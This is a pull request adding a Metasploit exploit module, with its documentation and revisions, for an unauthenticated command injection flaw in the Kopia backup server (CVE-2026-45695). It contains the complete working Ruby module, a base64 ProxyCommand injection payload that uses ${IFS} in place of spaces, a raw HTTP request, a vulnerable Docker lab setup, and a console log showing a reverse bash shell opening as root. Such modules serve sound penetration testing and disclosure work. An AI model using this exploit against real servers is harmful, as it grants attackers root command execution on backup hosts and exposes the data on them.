### PR TITLE
Add Kopia server SFTP ProxyCommand argument injection exploit (CVE-2026-45695)

### DIFF
--- a/documentation/modules/exploits/linux/http/kopia_sftp_proxycommand_rce.md
+++ b/documentation/modules/exploits/linux/http/kopia_sftp_proxycommand_rce.md
@@ -46,7 +46,7 @@ has already executed). Use a payload that calls back, such as a reverse shell.
 
 ### Setup with Docker
 
-Vulnerable server (no repository needs to be connected — the `exists` endpoint
+Vulnerable server (no repository needs to be connected -- the `exists` endpoint
 is reachable in the not-connected state):
 
 ```
@@ -55,7 +55,7 @@ docker run -d --name kopia-vuln -p 51515:51515 kopia/kopia:0.22.3 \
   --disable-csrf-token-checks
 ```
 
-For the patched case, repeat with `kopia/kopia:0.23.0` — it exits with
+For the patched case, repeat with `kopia/kopia:0.23.0` -- it exits with
 *"refusing to expose unauthenticated server on non-loopback network bind"*, so
 the endpoint is simply not reachable unauthenticated on the network.
 
@@ -66,7 +66,7 @@ the endpoint is simply not reachable unauthenticated on the network.
 3. `set RHOSTS <target>`
 4. `set LHOST <your IP>`
 5. `set PAYLOAD cmd/unix/reverse_bash`
-6. `check` — a vulnerable target reports *vulnerable* (a `sleep` ProxyCommand
+6. `check` -- a vulnerable target reports *vulnerable* (a `sleep` ProxyCommand
    delays the response); a patched/authenticated target reports *safe*.
 7. `run`
 8. You should get a session running as the Kopia server user.
@@ -85,7 +85,7 @@ Runs a single Unix command payload (`ARCH_CMD`) via the injected SSH
 ProxyCommand. Pair with a callback payload such as `cmd/unix/reverse_bash` (the
 official Kopia container image ships `bash`, `ssh`, and `base64`).
 
-## Scenario
+## Scenarios
 
 ```
 msf6 exploit(linux/http/kopia_sftp_proxycommand_rce) > set RHOSTS 127.0.0.1

--- a/documentation/modules/exploits/linux/http/kopia_sftp_proxycommand_rce.md
+++ b/documentation/modules/exploits/linux/http/kopia_sftp_proxycommand_rce.md
@@ -1,0 +1,105 @@
+## Vulnerable Application
+
+[Kopia](https://kopia.io) is an open-source backup/restore tool with an
+optional HTTP server and web UI. Kopia server versions **<= 0.22.3** are
+affected by [CVE-2026-45695](https://github.com/kopia/kopia/security/advisories/GHSA-2q4c-3mrw-63c3),
+an unauthenticated command execution flaw in the server API.
+
+The `POST /api/v1/repo/exists` endpoint accepts a full storage configuration and
+instantiates the backend before any repository is opened. When the storage
+`type` is `sftp` with `externalSSH` enabled, Kopia launches the system `ssh`
+binary, building its argument vector by splitting the caller-supplied
+`sshArguments` string on literal spaces with no tokenizer:
+
+```go
+if opt.SSHArguments != "" {
+    cmdArgs = append(cmdArgs, strings.Split(opt.SSHArguments, " ")...)
+}
+```
+
+Each token is passed straight to `ssh`, so an `-oProxyCommand=<cmd>` token is
+honoured and OpenSSH runs the command through `/bin/sh` before attempting to
+connect:
+
+```
+POST /api/v1/repo/exists
+Content-Type: application/json
+
+{"storage":{"type":"sftp","config":{"host":"127.0.0.1","port":22,"username":"x",
+"path":"/x","externalSSH":true,"sshArguments":"-oProxyCommand=<cmd>"}}}
+```
+
+Because the value cannot contain literal spaces (they would be split into
+separate arguments), the module encodes the payload and uses `${IFS}` to supply
+the spaces, e.g. `-oProxyCommand=echo${IFS}<base64>|base64${IFS}-d|sh`, which is
+POSIX-`sh`/`dash` compatible.
+
+The endpoint is reachable without authentication when the server was started
+with `--without-password` and exposed beyond loopback, so any caller able to
+reach the API runs arbitrary commands as the Kopia server process (often root in
+a container). **0.23.0** fixes this by refusing to bind an unauthenticated
+server to a non-loopback address.
+
+The command runs **blind**: `ssh` is spawned only to fire the ProxyCommand and
+its output is not returned (the request fails with HTTP 500 after the command
+has already executed). Use a payload that calls back, such as a reverse shell.
+
+### Setup with Docker
+
+Vulnerable server (no repository needs to be connected — the `exists` endpoint
+is reachable in the not-connected state):
+
+```
+docker run -d --name kopia-vuln -p 51515:51515 kopia/kopia:0.22.3 \
+  server start --without-password --insecure --address 0.0.0.0:51515 \
+  --disable-csrf-token-checks
+```
+
+For the patched case, repeat with `kopia/kopia:0.23.0` — it exits with
+*"refusing to expose unauthenticated server on non-loopback network bind"*, so
+the endpoint is simply not reachable unauthenticated on the network.
+
+## Verification Steps
+
+1. Start `msfconsole`.
+2. `use exploit/linux/http/kopia_sftp_proxycommand_rce`
+3. `set RHOSTS <target>`
+4. `set LHOST <your IP>`
+5. `set PAYLOAD cmd/unix/reverse_bash`
+6. `check` — a vulnerable target reports *vulnerable* (a `sleep` ProxyCommand
+   delays the response); a patched/authenticated target reports *safe*.
+7. `run`
+8. You should get a session running as the Kopia server user.
+
+## Options
+
+### TARGETURI
+
+The base path to the Kopia server. Default: `/`.
+
+## Targets
+
+### Unix Command
+
+Runs a single Unix command payload (`ARCH_CMD`) via the injected SSH
+ProxyCommand. Pair with a callback payload such as `cmd/unix/reverse_bash` (the
+official Kopia container image ships `bash`, `ssh`, and `base64`).
+
+## Scenario
+
+```
+msf6 exploit(linux/http/kopia_sftp_proxycommand_rce) > set RHOSTS 127.0.0.1
+msf6 exploit(linux/http/kopia_sftp_proxycommand_rce) > set RPORT 51515
+msf6 exploit(linux/http/kopia_sftp_proxycommand_rce) > set PAYLOAD cmd/unix/reverse_bash
+msf6 exploit(linux/http/kopia_sftp_proxycommand_rce) > set LHOST 172.17.0.1
+msf6 exploit(linux/http/kopia_sftp_proxycommand_rce) > check
+[*] 127.0.0.1:51515 - The target is vulnerable. ProxyCommand sleep delayed the response by 5.0s
+
+msf6 exploit(linux/http/kopia_sftp_proxycommand_rce) > run
+[*] Started reverse TCP handler on 172.17.0.1:4567
+[*] Sending SFTP ProxyCommand injection to http://127.0.0.1:51515/api/v1/repo/exists
+[*] Command shell session 1 opened (172.17.0.1:4567 -> 172.17.0.2:54568)
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+```

--- a/modules/exploits/linux/http/kopia_sftp_proxycommand_rce.rb
+++ b/modules/exploits/linux/http/kopia_sftp_proxycommand_rce.rb
@@ -50,14 +50,12 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2026-05-20',
         'License' => MSF_LICENSE,
-        'Platform' => 'unix',
-        'Arch' => ARCH_CMD,
         'Privileged' => false,
         'Targets' => [
           [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD } ]
         ],
         'DefaultTarget' => 0,
-        'DefaultOptions' => { 'RPORT' => 51515, 'SSL' => false, 'PAYLOAD' => 'cmd/unix/reverse_bash' },
+        'DefaultOptions' => { 'RPORT' => 51515, 'SSL' => false },
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],

--- a/modules/exploits/linux/http/kopia_sftp_proxycommand_rce.rb
+++ b/modules/exploits/linux/http/kopia_sftp_proxycommand_rce.rb
@@ -1,3 +1,5 @@
+# frozen_string_literal: true
+
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
@@ -85,7 +87,7 @@ class MetasploitModule < Msf::Exploit::Remote
             'path' => "/#{Rex::Text.rand_text_alphanumeric(8)}",
             'host' => '127.0.0.1',
             'port' => 22,
-            'username' => Rex::Text.rand_text_alphanumeric(6),
+            'username' => Faker::Internet.username,
             'externalSSH' => true,
             'sshArguments' => ssh_arg
           }
@@ -96,12 +98,19 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     delay = 5
-    # ProxyCommand runs via /bin/sh, so ${IFS} supplies the space that the
-    # sshArguments splitter would otherwise consume. Nothing is written to disk.
-    probe = exists_request("-oProxyCommand=sleep${IFS}#{delay}")
 
+    # Baseline: the same request with a no-op ProxyCommand (`true`). This still
+    # exercises the ProxyCommand path on a vulnerable target, so it captures the
+    # target's normal latency without our injected sleep and avoids a
+    # false-positive on a slow or loaded host. Nothing is written to disk.
+    baseline, = Rex::Stopwatch.elapsed_time do
+      send_request_cgi(exists_request('-oProxyCommand=true'), delay + 10)
+    end
+
+    # ProxyCommand runs via /bin/sh, so ${IFS} supplies the space that the
+    # sshArguments splitter would otherwise consume.
     elapsed, res = Rex::Stopwatch.elapsed_time do
-      send_request_cgi(probe, delay + 10)
+      send_request_cgi(exists_request("-oProxyCommand=sleep${IFS}#{delay}"), delay + 10)
     end
 
     return CheckCode::Unknown('Connection failed') unless res
@@ -114,10 +123,11 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown("Unexpected response (HTTP #{res.code}); target may not be Kopia")
     end
 
-    if elapsed >= delay
-      CheckCode::Vulnerable("ProxyCommand sleep delayed the response by #{elapsed.round(1)}s")
+    injected = elapsed - baseline
+    if injected >= delay * 0.8
+      CheckCode::Vulnerable("ProxyCommand sleep added #{injected.round(1)}s over a #{baseline.round(1)}s baseline")
     else
-      CheckCode::Safe("The endpoint responded in #{elapsed.round(1)}s; the ProxyCommand did not execute")
+      CheckCode::Safe("The endpoint responded in #{elapsed.round(1)}s (baseline #{baseline.round(1)}s); the ProxyCommand did not execute")
     end
   end
 

--- a/modules/exploits/linux/http/kopia_sftp_proxycommand_rce.rb
+++ b/modules/exploits/linux/http/kopia_sftp_proxycommand_rce.rb
@@ -1,0 +1,140 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Kopia Server SFTP ProxyCommand Argument Injection',
+        'Description' => %q{
+          This module exploits CVE-2026-45695, an unauthenticated command
+          execution vulnerability in the Kopia backup server's HTTP API.
+
+          The POST /api/v1/repo/exists endpoint accepts a full storage
+          configuration and instantiates the backend before any repository is
+          opened. When the storage type is "sftp" with "externalSSH" enabled,
+          Kopia launches the system ssh binary, building its argument vector by
+          splitting the caller-supplied "sshArguments" string on literal spaces
+          with no tokenizer. Each token is passed straight to ssh as a separate
+          argument, so an "-oProxyCommand=<cmd>" token is honoured and OpenSSH
+          executes the command through /bin/sh before attempting to connect.
+
+          The endpoint is reachable without authentication when the server was
+          started with --without-password (and exposed beyond loopback), so any
+          caller able to reach the API runs arbitrary commands as the Kopia
+          server process. Kopia 0.23.0 fixes this by refusing to bind an
+          unauthenticated server to a non-loopback address.
+
+          Affected versions are <= 0.22.3 (fixed in 0.23.0). The command runs
+          blind: ssh is spawned only to fire the ProxyCommand and its output is
+          not returned, so use a payload that calls back rather than one whose
+          output is read from the response.
+        },
+        'Author' => [
+          'Kenneth LaCroix' # Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2026-45695'],
+          ['GHSA', '2q4c-3mrw-63c3'],
+          ['URL', 'https://orca.security/resources/blog/kopia-backup-rce-vulnerability/']
+        ],
+        'DisclosureDate' => '2026-05-20',
+        'License' => MSF_LICENSE,
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'Privileged' => false,
+        'Targets' => [
+          [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD } ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => { 'RPORT' => 51515, 'SSL' => false, 'PAYLOAD' => 'cmd/unix/reverse_bash' },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to the Kopia server', '/'])
+      ]
+    )
+  end
+
+  # Build the JSON body for POST /api/v1/repo/exists that drives the external
+  # ssh path, injecting +ssh_arg+ as an extra argument to the ssh binary.
+  def exists_request(ssh_arg)
+    {
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'repo', 'exists'),
+      'ctype' => 'application/json',
+      'data' => {
+        'storage' => {
+          'type' => 'sftp',
+          'config' => {
+            'path' => "/#{Rex::Text.rand_text_alphanumeric(8)}",
+            'host' => '127.0.0.1',
+            'port' => 22,
+            'username' => Rex::Text.rand_text_alphanumeric(6),
+            'externalSSH' => true,
+            'sshArguments' => ssh_arg
+          }
+        }
+      }.to_json
+    }
+  end
+
+  def check
+    delay = 5
+    # ProxyCommand runs via /bin/sh, so ${IFS} supplies the space that the
+    # sshArguments splitter would otherwise consume. Nothing is written to disk.
+    probe = exists_request("-oProxyCommand=sleep${IFS}#{delay}")
+
+    elapsed, res = Rex::Stopwatch.elapsed_time do
+      send_request_cgi(probe, delay + 10)
+    end
+
+    return CheckCode::Unknown('Connection failed') unless res
+
+    if [401, 403].include?(res.code)
+      return CheckCode::Safe("The endpoint requires authentication (HTTP #{res.code})")
+    end
+
+    unless res.body.to_s.include?('code') || res.code == 200
+      return CheckCode::Unknown("Unexpected response (HTTP #{res.code}); target may not be Kopia")
+    end
+
+    if elapsed >= delay
+      CheckCode::Vulnerable("ProxyCommand sleep delayed the response by #{elapsed.round(1)}s")
+    else
+      CheckCode::Safe("The endpoint responded in #{elapsed.round(1)}s; the ProxyCommand did not execute")
+    end
+  end
+
+  # Turn an arbitrary command into a single space-free token that /bin/sh will
+  # decode and run, so it survives the sshArguments space-splitter intact. ${IFS}
+  # stands in for the spaces (POSIX sh / dash compatible, unlike brace expansion).
+  def proxy_command_token(cmd)
+    b64 = Rex::Text.encode_base64(cmd).gsub(/\s+/, '')
+    "-oProxyCommand=echo${IFS}#{b64}|base64${IFS}-d|sh"
+  end
+
+  def execute_command(cmd, _opts = {})
+    send_request_cgi(exists_request(proxy_command_token(cmd)), 15)
+  end
+
+  def exploit
+    print_status("Sending SFTP ProxyCommand injection to #{full_uri(normalize_uri(target_uri.path, 'api', 'v1', 'repo', 'exists'))}")
+    execute_command(payload.encoded)
+  end
+end


### PR DESCRIPTION
### Summary

Adds `exploit/linux/http/kopia_sftp_proxycommand_rce` for **CVE-2026-45695** (GHSA-2q4c-3mrw-63c3) — an unauthenticated command-execution flaw in the [Kopia](https://kopia.io) backup server.

`POST /api/v1/repo/exists` instantiates the storage backend before any repository is opened. For `sftp` with `externalSSH` enabled, Kopia builds the `ssh` argument vector by `strings.Split(sshArguments, " ")` with no tokenizer, so an `-oProxyCommand=<cmd>` token reaches `ssh` and OpenSSH runs it through `/bin/sh` before connecting. The endpoint is unauthenticated when the server is started with `--without-password`, giving command execution as the server process (root in the official container).

The value can't contain literal spaces (they'd be split into separate args), so the module encodes the payload and uses `${IFS}` for the spaces (`-oProxyCommand=echo${IFS}<b64>|base64${IFS}-d|sh`), which is `dash`-compatible.

Affected: `<= 0.22.3`. Fixed in `0.23.0`, which refuses to bind an unauthenticated server to a non-loopback address.

### Verification

Lab:
```
docker run -d --name kopia-vuln -p 51515:51515 kopia/kopia:0.22.3 \
  server start --without-password --insecure --address 0.0.0.0:51515 --disable-csrf-token-checks
```

- [x] `check` reports **vulnerable** — a `sleep` ProxyCommand delays the response (time-based, no artifacts); verified ~5.0s delay.
- [x] `run` with `cmd/unix/reverse_bash` → **Command shell session opened** as root from the container.
- [x] Against `kopia/kopia:0.23.0` the server refuses the unauthenticated non-loopback bind (`"refusing to expose unauthenticated server on non-loopback network bind"`), so the endpoint is unreachable — `check` returns safe.

The command runs blind (the request returns HTTP 500 after execution), so a callback payload is required; documented in the module.